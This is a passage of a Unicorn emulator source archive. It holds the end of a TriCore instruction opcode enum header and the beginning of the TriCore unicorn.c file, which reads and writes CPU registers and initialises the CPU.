OPC2_32_RCR_MADDS_64 = 0x07, OPC2_32_RCR_MADD_U_64 = 0x02, OPC2_32_RCR_MADDS_U_32 = 0x04, OPC2_32_RCR_MADDS_U_64 = 0x06, }; /* OPCM_32_RCR_MSUB */ enum { OPC2_32_RCR_MSUB_32 = 0x01, OPC2_32_RCR_MSUB_64 = 0x03, OPC2_32_RCR_MSUBS_32 = 0x05, OPC2_32_RCR_MSUBS_64 = 0x07, OPC2_32_RCR_MSUB_U_64 = 0x02, OPC2_32_RCR_MSUBS_U_32 = 0x04, OPC2_32_RCR_MSUBS_U_64 = 0x06, }; /* * RCRW Format */ /* OPCM_32_RCRW_MASK_INSERT */ enum { OPC2_32_RCRW_IMASK = 0x01, OPC2_32_RCRW_INSERT = 0x00, }; /* * RR Format */ /* OPCM_32_RR_LOGICAL_SHIFT */ enum { OPC2_32_RR_AND = 0x08, OPC2_32_RR_ANDN = 0x0e, OPC2_32_RR_CLO = 0x1c, OPC2_32_RR_CLO_H = 0x7d, OPC2_32_RR_CLS = 0x1d, OPC2_32_RR_CLS_H = 0x7e, OPC2_32_RR_CLZ = 0x1b, OPC2_32_RR_CLZ_H = 0x7c, OPC2_32_RR_NAND = 0x09, OPC2_32_RR_NOR = 0x0b, OPC2_32_RR_OR = 0x0a, OPC2_32_RR_ORN = 0x0f, OPC2_32_RR_SH = 0x00, OPC2_32_RR_SH_H = 0x40, OPC2_32_RR_SHA = 0x01, OPC2_32_RR_SHA_H = 0x41, OPC2_32_RR_SHAS = 0x02, OPC2_32_RR_XNOR = 0x0d, OPC2_32_RR_XOR = 0x0c, }; /* OPCM_32_RR_ACCUMULATOR */ enum { OPC2_32_RR_ABS = 0x1c, OPC2_32_RR_ABS_B = 0x5c, OPC2_32_RR_ABS_H = 0x7c, OPC2_32_RR_ABSDIF = 0x0e, OPC2_32_RR_ABSDIF_B = 0x4e, OPC2_32_RR_ABSDIF_H = 0x6e, OPC2_32_RR_ABSDIFS = 0x0f, OPC2_32_RR_ABSDIFS_H = 0x6f, OPC2_32_RR_ABSS = 0x1d, OPC2_32_RR_ABSS_H = 0x7d, OPC2_32_RR_ADD = 0x00, OPC2_32_RR_ADD_B = 0x40, OPC2_32_RR_ADD_H = 0x60, OPC2_32_RR_ADDC = 0x05, OPC2_32_RR_ADDS = 0x02, OPC2_32_RR_ADDS_H = 0x62, OPC2_32_RR_ADDS_HU = 0x63, OPC2_32_RR_ADDS_U = 0x03, OPC2_32_RR_ADDX = 0x04, OPC2_32_RR_AND_EQ = 0x20, OPC2_32_RR_AND_GE = 0x24, OPC2_32_RR_AND_GE_U = 0x25, OPC2_32_RR_AND_LT = 0x22, OPC2_32_RR_AND_LT_U = 0x23, OPC2_32_RR_AND_NE = 0x21, OPC2_32_RR_EQ = 0x10, OPC2_32_RR_EQ_B = 0x50, OPC2_32_RR_EQ_H = 0x70, OPC2_32_RR_EQ_W = 0x90, OPC2_32_RR_EQANY_B = 0x56, OPC2_32_RR_EQANY_H = 0x76, OPC2_32_RR_GE = 0x14, OPC2_32_RR_GE_U = 0x15, OPC2_32_RR_LT = 0x12, OPC2_32_RR_LT_U = 0x13, OPC2_32_RR_LT_B = 0x52, OPC2_32_RR_LT_BU = 0x53, OPC2_32_RR_LT_H = 0x72, OPC2_32_RR_LT_HU = 0x73, OPC2_32_RR_LT_W = 0x92, OPC2_32_RR_LT_WU = 0x93, OPC2_32_RR_MAX = 0x1a, OPC2_32_RR_MAX_U = 0x1b, OPC2_32_RR_MAX_B = 0x5a, OPC2_32_RR_MAX_BU = 0x5b, OPC2_32_RR_MAX_H = 0x7a, OPC2_32_RR_MAX_HU = 0x7b, OPC2_32_RR_MIN = 0x18, OPC2_32_RR_MIN_U = 0x19, OPC2_32_RR_MIN_B = 0x58, OPC2_32_RR_MIN_BU = 0x59, OPC2_32_RR_MIN_H = 0x78, OPC2_32_RR_MIN_HU = 0x79, OPC2_32_RR_MOV = 0x1f, OPC2_32_RR_MOVS_64 = 0x80, OPC2_32_RR_MOV_64 = 0x81, OPC2_32_RR_NE = 0x11, OPC2_32_RR_OR_EQ = 0x27, OPC2_32_RR_OR_GE = 0x2b, OPC2_32_RR_OR_GE_U = 0x2c, OPC2_32_RR_OR_LT = 0x29, OPC2_32_RR_OR_LT_U = 0x2a, OPC2_32_RR_OR_NE = 0x28, OPC2_32_RR_SAT_B = 0x5e, OPC2_32_RR_SAT_BU = 0x5f, OPC2_32_RR_SAT_H = 0x7e, OPC2_32_RR_SAT_HU = 0x7f, OPC2_32_RR_SH_EQ = 0x37, OPC2_32_RR_SH_GE = 0x3b, OPC2_32_RR_SH_GE_U = 0x3c, OPC2_32_RR_SH_LT = 0x39, OPC2_32_RR_SH_LT_U = 0x3a, OPC2_32_RR_SH_NE = 0x38, OPC2_32_RR_SUB = 0x08, OPC2_32_RR_SUB_B = 0x48, OPC2_32_RR_SUB_H = 0x68, OPC2_32_RR_SUBC = 0x0d, OPC2_32_RR_SUBS = 0x0a, OPC2_32_RR_SUBS_U = 0x0b, OPC2_32_RR_SUBS_H = 0x6a, OPC2_32_RR_SUBS_HU = 0x6b, OPC2_32_RR_SUBX = 0x0c, OPC2_32_RR_XOR_EQ = 0x2f, OPC2_32_RR_XOR_GE = 0x33, OPC2_32_RR_XOR_GE_U = 0x34, OPC2_32_RR_XOR_LT = 0x31, OPC2_32_RR_XOR_LT_U = 0x32, OPC2_32_RR_XOR_NE = 0x30, }; /* OPCM_32_RR_ADDRESS */ enum { OPC2_32_RR_ADD_A = 0x01, OPC2_32_RR_ADDSC_A = 0x60, OPC2_32_RR_ADDSC_AT = 0x62, OPC2_32_RR_EQ_A = 0x40, OPC2_32_RR_EQZ = 0x48, OPC2_32_RR_GE_A = 0x43, OPC2_32_RR_LT_A = 0x42, OPC2_32_RR_MOV_A = 0x63, OPC2_32_RR_MOV_AA = 0x00, OPC2_32_RR_MOV_D = 0x4c, OPC2_32_RR_NE_A = 0x41, OPC2_32_RR_NEZ_A = 0x49, OPC2_32_RR_SUB_A = 0x02, }; /* OPCM_32_RR_FLOAT */ enum { OPC2_32_RR_BMERGE = 0x01, OPC2_32_RR_BSPLIT = 0x09, OPC2_32_RR_DVINIT_B = 0x5a, OPC2_32_RR_DVINIT_BU = 0x4a, OPC2_32_RR_DVINIT_H = 0x3a, OPC2_32_RR_DVINIT_HU = 0x2a, OPC2_32_RR_DVINIT = 0x1a, OPC2_32_RR_DVINIT_U = 0x0a, OPC2_32_RR_PARITY = 0x02, OPC2_32_RR_UNPACK = 0x08, OPC2_32_RR_CRC32 = 0x03, OPC2_32_RR_DIV = 0x20, OPC2_32_RR_DIV_U = 0x21, OPC2_32_RR_MUL_F = 0x04, OPC2_32_RR_DIV_F = 0x05, OPC2_32_RR_FTOI = 0x10, OPC2_32_RR_ITOF = 0x14, OPC2_32_RR_CMP_F = 0x00, OPC2_32_RR_FTOIZ = 0x13, OPC2_32_RR_FTOQ31 = 0x11, OPC2_32_RR_FTOQ31Z = 0x18, OPC2_32_RR_FTOU = 0x12, OPC2_32_RR_FTOUZ = 0x17, OPC2_32_RR_Q31TOF = 0x15, OPC2_32_RR_QSEED_F = 0x19, OPC2_32_RR_UPDFL = 0x0c, OPC2_32_RR_UTOF = 0x16, }; /* OPCM_32_RR_IDIRECT */ enum { OPC2_32_RR_JI = 0x03, OPC2_32_RR_JLI = 0x02, OPC2_32_RR_CALLI = 0x00, OPC2_32_RR_FCALLI = 0x01, }; /* * RR1 Format */ /* OPCM_32_RR1_MUL */ enum { OPC2_32_RR1_MUL_H_32_LL = 0x1a, OPC2_32_RR1_MUL_H_32_LU = 0x19, OPC2_32_RR1_MUL_H_32_UL = 0x18, OPC2_32_RR1_MUL_H_32_UU = 0x1b, OPC2_32_RR1_MULM_H_64_LL = 0x1e, OPC2_32_RR1_MULM_H_64_LU = 0x1d, OPC2_32_RR1_MULM_H_64_UL = 0x1c, OPC2_32_RR1_MULM_H_64_UU = 0x1f, OPC2_32_RR1_MULR_H_16_LL = 0x0e, OPC2_32_RR1_MULR_H_16_LU = 0x0d, OPC2_32_RR1_MULR_H_16_UL = 0x0c, OPC2_32_RR1_MULR_H_16_UU = 0x0f, }; /* OPCM_32_RR1_MULQ */ enum { OPC2_32_RR1_MUL_Q_32 = 0x02, OPC2_32_RR1_MUL_Q_64 = 0x1b, OPC2_32_RR1_MUL_Q_32_L = 0x01, OPC2_32_RR1_MUL_Q_64_L = 0x19, OPC2_32_RR1_MUL_Q_32_U = 0x00, OPC2_32_RR1_MUL_Q_64_U = 0x18, OPC2_32_RR1_MUL_Q_32_LL = 0x05, OPC2_32_RR1_MUL_Q_32_UU = 0x04, OPC2_32_RR1_MULR_Q_32_L = 0x07, OPC2_32_RR1_MULR_Q_32_U = 0x06, }; /* * RR2 Format */ /* OPCM_32_RR2_MUL */ enum { OPC2_32_RR2_MUL_32 = 0x0a, OPC2_32_RR2_MUL_64 = 0x6a, OPC2_32_RR2_MULS_32 = 0x8a, OPC2_32_RR2_MUL_U_64 = 0x68, OPC2_32_RR2_MULS_U_32 = 0x88, }; /* * RRPW Format */ /* OPCM_32_RRPW_EXTRACT_INSERT */ enum { OPC2_32_RRPW_EXTR = 0x02, OPC2_32_RRPW_EXTR_U = 0x03, OPC2_32_RRPW_IMASK = 0x01, OPC2_32_RRPW_INSERT = 0x00, }; /* * RRR Format */ /* OPCM_32_RRR_COND_SELECT */ enum { OPC2_32_RRR_CADD = 0x00, OPC2_32_RRR_CADDN = 0x01, OPC2_32_RRR_CSUB = 0x02, OPC2_32_RRR_CSUBN = 0x03, OPC2_32_RRR_SEL = 0x04, OPC2_32_RRR_SELN = 0x05, }; /* OPCM_32_RRR_FLOAT */ enum { OPC2_32_RRR_DVADJ = 0x0d, OPC2_32_RRR_DVSTEP = 0x0f, OPC2_32_RRR_DVSTEP_U = 0x0e, OPC2_32_RRR_IXMAX = 0x0a, OPC2_32_RRR_IXMAX_U = 0x0b, OPC2_32_RRR_IXMIN = 0x08, OPC2_32_RRR_IXMIN_U = 0x09, OPC2_32_RRR_PACK = 0x00, OPC2_32_RRR_ADD_F = 0x02, OPC2_32_RRR_SUB_F = 0x03, OPC2_32_RRR_MADD_F = 0x06, OPC2_32_RRR_MSUB_F = 0x07, }; /* * RRR1 Format */ /* OPCM_32_RRR1_MADD */ enum { OPC2_32_RRR1_MADD_H_LL = 0x1a, OPC2_32_RRR1_MADD_H_LU = 0x19, OPC2_32_RRR1_MADD_H_UL = 0x18, OPC2_32_RRR1_MADD_H_UU = 0x1b, OPC2_32_RRR1_MADDS_H_LL = 0x3a, OPC2_32_RRR1_MADDS_H_LU = 0x39, OPC2_32_RRR1_MADDS_H_UL = 0x38, OPC2_32_RRR1_MADDS_H_UU = 0x3b, OPC2_32_RRR1_MADDM_H_LL = 0x1e, OPC2_32_RRR1_MADDM_H_LU = 0x1d, OPC2_32_RRR1_MADDM_H_UL = 0x1c, OPC2_32_RRR1_MADDM_H_UU = 0x1f, OPC2_32_RRR1_MADDMS_H_LL = 0x3e, OPC2_32_RRR1_MADDMS_H_LU = 0x3d, OPC2_32_RRR1_MADDMS_H_UL = 0x3c, OPC2_32_RRR1_MADDMS_H_UU = 0x3f, OPC2_32_RRR1_MADDR_H_LL = 0x0e, OPC2_32_RRR1_MADDR_H_LU = 0x0d, OPC2_32_RRR1_MADDR_H_UL = 0x0c, OPC2_32_RRR1_MADDR_H_UU = 0x0f, OPC2_32_RRR1_MADDRS_H_LL = 0x2e, OPC2_32_RRR1_MADDRS_H_LU = 0x2d, OPC2_32_RRR1_MADDRS_H_UL = 0x2c, OPC2_32_RRR1_MADDRS_H_UU = 0x2f, }; /* OPCM_32_RRR1_MADDQ_H */ enum { OPC2_32_RRR1_MADD_Q_32 = 0x02, OPC2_32_RRR1_MADD_Q_64 = 0x1b, OPC2_32_RRR1_MADD_Q_32_L = 0x01, OPC2_32_RRR1_MADD_Q_64_L = 0x19, OPC2_32_RRR1_MADD_Q_32_U = 0x00, OPC2_32_RRR1_MADD_Q_64_U = 0x18, OPC2_32_RRR1_MADD_Q_32_LL = 0x05, OPC2_32_RRR1_MADD_Q_64_LL = 0x1d, OPC2_32_RRR1_MADD_Q_32_UU = 0x04, OPC2_32_RRR1_MADD_Q_64_UU = 0x1c, OPC2_32_RRR1_MADDS_Q_32 = 0x22, OPC2_32_RRR1_MADDS_Q_64 = 0x3b, OPC2_32_RRR1_MADDS_Q_32_L = 0x21, OPC2_32_RRR1_MADDS_Q_64_L = 0x39, OPC2_32_RRR1_MADDS_Q_32_U = 0x20, OPC2_32_RRR1_MADDS_Q_64_U = 0x38, OPC2_32_RRR1_MADDS_Q_32_LL = 0x25, OPC2_32_RRR1_MADDS_Q_64_LL = 0x3d, OPC2_32_RRR1_MADDS_Q_32_UU = 0x24, OPC2_32_RRR1_MADDS_Q_64_UU = 0x3c, OPC2_32_RRR1_MADDR_H_64_UL = 0x1e, OPC2_32_RRR1_MADDRS_H_64_UL = 0x3e, OPC2_32_RRR1_MADDR_Q_32_LL = 0x07, OPC2_32_RRR1_MADDR_Q_32_UU = 0x06, OPC2_32_RRR1_MADDRS_Q_32_LL = 0x27, OPC2_32_RRR1_MADDRS_Q_32_UU = 0x26, }; /* OPCM_32_RRR1_MADDSU_H */ enum { OPC2_32_RRR1_MADDSU_H_32_LL = 0x1a, OPC2_32_RRR1_MADDSU_H_32_LU = 0x19, OPC2_32_RRR1_MADDSU_H_32_UL = 0x18, OPC2_32_RRR1_MADDSU_H_32_UU = 0x1b, OPC2_32_RRR1_MADDSUS_H_32_LL = 0x3a, OPC2_32_RRR1_MADDSUS_H_32_LU = 0x39, OPC2_32_RRR1_MADDSUS_H_32_UL = 0x38, OPC2_32_RRR1_MADDSUS_H_32_UU = 0x3b, OPC2_32_RRR1_MADDSUM_H_64_LL = 0x1e, OPC2_32_RRR1_MADDSUM_H_64_LU = 0x1d, OPC2_32_RRR1_MADDSUM_H_64_UL = 0x1c, OPC2_32_RRR1_MADDSUM_H_64_UU = 0x1f, OPC2_32_RRR1_MADDSUMS_H_64_LL = 0x3e, OPC2_32_RRR1_MADDSUMS_H_64_LU = 0x3d, OPC2_32_RRR1_MADDSUMS_H_64_UL = 0x3c, OPC2_32_RRR1_MADDSUMS_H_64_UU = 0x3f, OPC2_32_RRR1_MADDSUR_H_16_LL = 0x0e, OPC2_32_RRR1_MADDSUR_H_16_LU = 0x0d, OPC2_32_RRR1_MADDSUR_H_16_UL = 0x0c, OPC2_32_RRR1_MADDSUR_H_16_UU = 0x0f, OPC2_32_RRR1_MADDSURS_H_16_LL = 0x2e, OPC2_32_RRR1_MADDSURS_H_16_LU = 0x2d, OPC2_32_RRR1_MADDSURS_H_16_UL = 0x2c, OPC2_32_RRR1_MADDSURS_H_16_UU = 0x2f, }; /* OPCM_32_RRR1_MSUB_H */ enum { OPC2_32_RRR1_MSUB_H_LL = 0x1a, OPC2_32_RRR1_MSUB_H_LU = 0x19, OPC2_32_RRR1_MSUB_H_UL = 0x18, OPC2_32_RRR1_MSUB_H_UU = 0x1b, OPC2_32_RRR1_MSUBS_H_LL = 0x3a, OPC2_32_RRR1_MSUBS_H_LU = 0x39, OPC2_32_RRR1_MSUBS_H_UL = 0x38, OPC2_32_RRR1_MSUBS_H_UU = 0x3b, OPC2_32_RRR1_MSUBM_H_LL = 0x1e, OPC2_32_RRR1_MSUBM_H_LU = 0x1d, OPC2_32_RRR1_MSUBM_H_UL = 0x1c, OPC2_32_RRR1_MSUBM_H_UU = 0x1f, OPC2_32_RRR1_MSUBMS_H_LL = 0x3e, OPC2_32_RRR1_MSUBMS_H_LU = 0x3d, OPC2_32_RRR1_MSUBMS_H_UL = 0x3c, OPC2_32_RRR1_MSUBMS_H_UU = 0x3f, OPC2_32_RRR1_MSUBR_H_LL = 0x0e, OPC2_32_RRR1_MSUBR_H_LU = 0x0d, OPC2_32_RRR1_MSUBR_H_UL = 0x0c, OPC2_32_RRR1_MSUBR_H_UU = 0x0f, OPC2_32_RRR1_MSUBRS_H_LL = 0x2e, OPC2_32_RRR1_MSUBRS_H_LU = 0x2d, OPC2_32_RRR1_MSUBRS_H_UL = 0x2c, OPC2_32_RRR1_MSUBRS_H_UU = 0x2f, }; /* OPCM_32_RRR1_MSUB_Q */ enum { OPC2_32_RRR1_MSUB_Q_32 = 0x02, OPC2_32_RRR1_MSUB_Q_64 = 0x1b, OPC2_32_RRR1_MSUB_Q_32_L = 0x01, OPC2_32_RRR1_MSUB_Q_64_L = 0x19, OPC2_32_RRR1_MSUB_Q_32_U = 0x00, OPC2_32_RRR1_MSUB_Q_64_U = 0x18, OPC2_32_RRR1_MSUB_Q_32_LL = 0x05, OPC2_32_RRR1_MSUB_Q_64_LL = 0x1d, OPC2_32_RRR1_MSUB_Q_32_UU = 0x04, OPC2_32_RRR1_MSUB_Q_64_UU = 0x1c, OPC2_32_RRR1_MSUBS_Q_32 = 0x22, OPC2_32_RRR1_MSUBS_Q_64 = 0x3b, OPC2_32_RRR1_MSUBS_Q_32_L = 0x21, OPC2_32_RRR1_MSUBS_Q_64_L = 0x39, OPC2_32_RRR1_MSUBS_Q_32_U = 0x20, OPC2_32_RRR1_MSUBS_Q_64_U = 0x38, OPC2_32_RRR1_MSUBS_Q_32_LL = 0x25, OPC2_32_RRR1_MSUBS_Q_64_LL = 0x3d, OPC2_32_RRR1_MSUBS_Q_32_UU = 0x24, OPC2_32_RRR1_MSUBS_Q_64_UU = 0x3c, OPC2_32_RRR1_MSUBR_H_64_UL = 0x1e, OPC2_32_RRR1_MSUBRS_H_64_UL = 0x3e, OPC2_32_RRR1_MSUBR_Q_32_LL = 0x07, OPC2_32_RRR1_MSUBR_Q_32_UU = 0x06, OPC2_32_RRR1_MSUBRS_Q_32_LL = 0x27, OPC2_32_RRR1_MSUBRS_Q_32_UU = 0x26, }; /* OPCM_32_RRR1_MSUBADS_H */ enum { OPC2_32_RRR1_MSUBAD_H_32_LL = 0x1a, OPC2_32_RRR1_MSUBAD_H_32_LU = 0x19, OPC2_32_RRR1_MSUBAD_H_32_UL = 0x18, OPC2_32_RRR1_MSUBAD_H_32_UU = 0x1b, OPC2_32_RRR1_MSUBADS_H_32_LL = 0x3a, OPC2_32_RRR1_MSUBADS_H_32_LU = 0x39, OPC2_32_RRR1_MSUBADS_H_32_UL = 0x38, OPC2_32_RRR1_MSUBADS_H_32_UU = 0x3b, OPC2_32_RRR1_MSUBADM_H_64_LL = 0x1e, OPC2_32_RRR1_MSUBADM_H_64_LU = 0x1d, OPC2_32_RRR1_MSUBADM_H_64_UL = 0x1c, OPC2_32_RRR1_MSUBADM_H_64_UU = 0x1f, OPC2_32_RRR1_MSUBADMS_H_64_LL = 0x3e, OPC2_32_RRR1_MSUBADMS_H_64_LU = 0x3d, OPC2_32_RRR1_MSUBADMS_H_64_UL = 0x3c, OPC2_32_RRR1_MSUBADMS_H_64_UU = 0x3f, OPC2_32_RRR1_MSUBADR_H_16_LL = 0x0e, OPC2_32_RRR1_MSUBADR_H_16_LU = 0x0d, OPC2_32_RRR1_MSUBADR_H_16_UL = 0x0c, OPC2_32_RRR1_MSUBADR_H_16_UU = 0x0f, OPC2_32_RRR1_MSUBADRS_H_16_LL = 0x2e, OPC2_32_RRR1_MSUBADRS_H_16_LU = 0x2d, OPC2_32_RRR1_MSUBADRS_H_16_UL = 0x2c, OPC2_32_RRR1_MSUBADRS_H_16_UU = 0x2f, }; /* * RRR2 Format */ /* OPCM_32_RRR2_MADD */ enum { OPC2_32_RRR2_MADD_32 = 0x0a, OPC2_32_RRR2_MADD_64 = 0x6a, OPC2_32_RRR2_MADDS_32 = 0x8a, OPC2_32_RRR2_MADDS_64 = 0xea, OPC2_32_RRR2_MADD_U_64 = 0x68, OPC2_32_RRR2_MADDS_U_32 = 0x88, OPC2_32_RRR2_MADDS_U_64 = 0xe8, }; /* OPCM_32_RRR2_MSUB */ enum { OPC2_32_RRR2_MSUB_32 = 0x0a, OPC2_32_RRR2_MSUB_64 = 0x6a, OPC2_32_RRR2_MSUBS_32 = 0x8a, OPC2_32_RRR2_MSUBS_64 = 0xea, OPC2_32_RRR2_MSUB_U_64 = 0x68, OPC2_32_RRR2_MSUBS_U_32 = 0x88, OPC2_32_RRR2_MSUBS_U_64 = 0xe8, }; /* * RRRR Format */ /* OPCM_32_RRRR_EXTRACT_INSERT */ enum { OPC2_32_RRRR_DEXTR = 0x04, OPC2_32_RRRR_EXTR = 0x02, OPC2_32_RRRR_EXTR_U = 0x03, OPC2_32_RRRR_INSERT = 0x00, }; /* * RRRW Format */ /* OPCM_32_RRRW_EXTRACT_INSERT */ enum { OPC2_32_RRRW_EXTR = 0x02, OPC2_32_RRRW_EXTR_U = 0x03, OPC2_32_RRRW_IMASK = 0x01, OPC2_32_RRRW_INSERT = 0x00, }; /* * SYS Format */ /* OPCM_32_SYS_INTERRUPTS */ enum { OPC2_32_SYS_DEBUG = 0x04, OPC2_32_SYS_DISABLE = 0x0d, OPC2_32_SYS_DSYNC = 0x12, OPC2_32_SYS_ENABLE = 0x0c, OPC2_32_SYS_ISYNC = 0x13, OPC2_32_SYS_NOP = 0x00, OPC2_32_SYS_RET = 0x06, OPC2_32_SYS_RFE = 0x07, OPC2_32_SYS_RFM = 0x05, OPC2_32_SYS_RSLCX = 0x09, OPC2_32_SYS_SVLCX = 0x08, OPC2_32_SYS_TRAPSV = 0x15, OPC2_32_SYS_TRAPV = 0x14, OPC2_32_SYS_RESTORE = 0x0e, OPC2_32_SYS_FRET = 0x03, }; #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/unicorn.c���������������������������������������������������������0000664�0000000�0000000�00000021363�14675241067�0020736�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #include "qemu/typedefs.h" #include "unicorn/unicorn.h" #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "cpu.h" #include "uc_priv.h" #include "unicorn_common.h" #include "unicorn.h" TriCoreCPU *cpu_tricore_init(struct uc_struct *uc); static void tricore_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUTriCoreState *)uc->cpu->env_ptr)->PC = address; } static uint64_t tricore_get_pc(struct uc_struct *uc) { return ((CPUTriCoreState *)uc->cpu->env_ptr)->PC; } static void reg_reset(struct uc_struct *uc) { CPUTriCoreState *env; (void)uc; env = uc->cpu->env_ptr; memset(env->gpr_a, 0, sizeof(env->gpr_a)); memset(env->gpr_d, 0, sizeof(env->gpr_d)); env->PC = 0; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUTriCoreState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_TRICORE_REG_A0 && regid <= UC_TRICORE_REG_A9) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gpr_a[regid - UC_TRICORE_REG_A0]; } else if (regid >= UC_TRICORE_REG_A12 && regid <= UC_TRICORE_REG_A15) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gpr_a[regid - UC_TRICORE_REG_A0]; } else if (regid >= UC_TRICORE_REG_D0 && regid <= UC_TRICORE_REG_D15) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gpr_d[regid - UC_TRICORE_REG_D0]; } else { switch (regid) { // case UC_TRICORE_REG_SP: case UC_TRICORE_REG_A10: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gpr_a[10]; break; // case UC_TRICORE_REG_LR: case UC_TRICORE_REG_A11: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gpr_a[11]; break; case UC_TRICORE_REG_PC: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->PC; break; case UC_TRICORE_REG_PCXI: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->PCXI; break; case UC_TRICORE_REG_PSW: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->PSW; break; case UC_TRICORE_REG_PSW_USB_C: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->PSW_USB_C; break; case UC_TRICORE_REG_PSW_USB_V: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->PSW_USB_V; break; case UC_TRICORE_REG_PSW_USB_SV: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->PSW_USB_SV; break; case UC_TRICORE_REG_PSW_USB_AV: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->PSW_USB_AV; break; case UC_TRICORE_REG_PSW_USB_SAV: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->PSW_USB_SAV; break; case UC_TRICORE_REG_SYSCON: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->SYSCON; break; case UC_TRICORE_REG_CPU_ID: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->CPU_ID; break; case UC_TRICORE_REG_BIV: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->BIV; break; case UC_TRICORE_REG_BTV: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->BTV; break; case UC_TRICORE_REG_ISP: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->ISP; break; case UC_TRICORE_REG_ICR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->ICR; break; case UC_TRICORE_REG_FCX: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->FCX; break; case UC_TRICORE_REG_LCX: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->LCX; break; case UC_TRICORE_REG_COMPAT: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->COMPAT; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUTriCoreState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_TRICORE_REG_A0 && regid <= UC_TRICORE_REG_A9) { CHECK_REG_TYPE(uint32_t); env->gpr_a[regid - UC_TRICORE_REG_A0] = *(uint32_t *)value; } else if (regid >= UC_TRICORE_REG_A12 && regid <= UC_TRICORE_REG_A15) { CHECK_REG_TYPE(uint32_t); env->gpr_a[regid - UC_TRICORE_REG_A0] = *(uint32_t *)value; } else if (regid >= UC_TRICORE_REG_D0 && regid <= UC_TRICORE_REG_D15) { CHECK_REG_TYPE(uint32_t); env->gpr_d[regid - UC_TRICORE_REG_D0] = *(uint32_t *)value; } else { switch (regid) { // case UC_TRICORE_REG_SP: case UC_TRICORE_REG_A10: CHECK_REG_TYPE(uint32_t); env->gpr_a[10] = *(uint32_t *)value; break; // case UC_TRICORE_REG_LR: case UC_TRICORE_REG_A11: CHECK_REG_TYPE(uint32_t); env->gpr_a[11] = *(uint32_t *)value; break; case UC_TRICORE_REG_PC: CHECK_REG_TYPE(uint32_t); env->PC = *(uint32_t *)value; *setpc = 1; break; case UC_TRICORE_REG_PCXI: CHECK_REG_TYPE(uint32_t); env->PCXI = *(uint32_t *)value; break; case UC_TRICORE_REG_PSW: CHECK_REG_TYPE(uint32_t); env->PSW = *(uint32_t *)value; break; case UC_TRICORE_REG_PSW_USB_C: CHECK_REG_TYPE(uint32_t); env->PSW_USB_C = *(uint32_t *)value; break; case UC_TRICORE_REG_PSW_USB_V: CHECK_REG_TYPE(uint32_t); env->PSW_USB_V = *(uint32_t *)value; break; case UC_TRICORE_REG_PSW_USB_SV: CHECK_REG_TYPE(uint32_t); env->PSW_USB_SV = *(uint32_t *)value; break; case UC_TRICORE_REG_PSW_USB_AV: CHECK_REG_TYPE(uint32_t); env->PSW_USB_AV = *(uint32_t *)value; break; case UC_TRICORE_REG_PSW_USB_SAV: CHECK_REG_TYPE(uint32_t); env->PSW_USB_SAV = *(uint32_t *)value; break; case UC_TRICORE_REG_SYSCON: CHECK_REG_TYPE(uint32_t); env->SYSCON = *(uint32_t *)value; break; case UC_TRICORE_REG_CPU_ID: CHECK_REG_TYPE(uint32_t); env->CPU_ID = *(uint32_t *)value; break; case UC_TRICORE_REG_BIV: CHECK_REG_TYPE(uint32_t); env->BIV = *(uint32_t *)value; break; case UC_TRICORE_REG_BTV: CHECK_REG_TYPE(uint32_t); env->BTV = *(uint32_t *)value; break; case UC_TRICORE_REG_ISP: CHECK_REG_TYPE(uint32_t); env->ISP = *(uint32_t *)value; break; case UC_TRICORE_REG_ICR: CHECK_REG_TYPE(uint32_t); env->ICR = *(uint32_t *)value; break; case UC_TRICORE_REG_FCX: CHECK_REG_TYPE(uint32_t); env->FCX = *(uint32_t *)value; break; case UC_TRICORE_REG_LCX: CHECK_REG_TYPE(uint32_t); env->LCX = *(uint32_t *)value; break; case UC_TRICORE_REG_COMPAT: CHECK_REG_TYPE(uint32_t); env->COMPAT = *(uint32_t *)value; break; } } return ret; } static int tricore_cpus_init(struct uc_struct *uc, const char *cpu_model) { TriCoreCPU *cpu; cpu = cpu_tricore_init(uc); if (cpu == NULL) { return -1; } return 0; } static void tricore_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; TriCoreCPU *cpu = (TriCoreCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); 